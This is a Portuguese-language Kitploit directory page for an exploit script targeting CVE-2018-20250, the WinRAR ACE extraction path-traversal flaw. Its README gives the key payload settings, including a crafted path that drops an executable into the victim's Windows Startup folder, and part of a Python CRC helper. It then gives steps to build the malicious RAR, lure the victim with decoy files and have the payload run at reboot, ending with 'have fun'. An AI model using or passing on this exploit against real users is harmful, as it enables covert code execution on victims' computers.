Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-20250 — Script de exploração para CVE-2018-20250 que gera automaticamente arquivos RAR maliciosos para alcançar execução de código através da vulnerabilidade de extração de arquivos ACE do WinRAR. | Kitploit
Ferramentas/GitHubGitHub/aeolustf/cve-2018-20250
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubaeolustf/cve-2018-20250

CVE-2018-20250

Script de exploração para CVE-2018-20250 que gera automaticamente arquivos RAR maliciosos para alcançar execução de código através da vulnerabilidade de extração de arquivos ACE do WinRAR.

Ver Repositório
1há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

exploit para Extrair Execução de Código do WinRAR

poc por Ridter

como usar?

você só precisa instalar o Python 3.7 e preparar um arquivo malicioso que deseja executar, definir os valores desejados, este script de exploit gerará o arquivo malicioso automaticamente!

  1. defina os valores desejados
root@kitploit:~
... ...

# O nome do arquivo do archive que você deseja
rar_filename = "test.rar"
# O arquivo malicioso que você deseja executar
evil_filename = "calc.exe"
# O caminho de descompressão desejado, conforme mostrado abaixo
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Outros arquivos a serem exibidos quando a vítima abrir o winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # Este comando pode ser diferente, depende do seu ambiente Python3.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. execute o exploit, o exploit gera o test.rar automaticamente

  2. se a vítima abrir o test.rar, ela verá os arquivos hello.txt e world.txt, você também pode adicionar mais arquivos, mais atraentes.

  1. quando ela descompactar o arquivo, o diretório de inicialização do usuário da vítima terá mais um arquivo chamado hi.exe, na verdade é um calc.exe. quando ela reiniciar o computador, o hi.exe será executado.

divirta-se! :)

Baixar ferramenta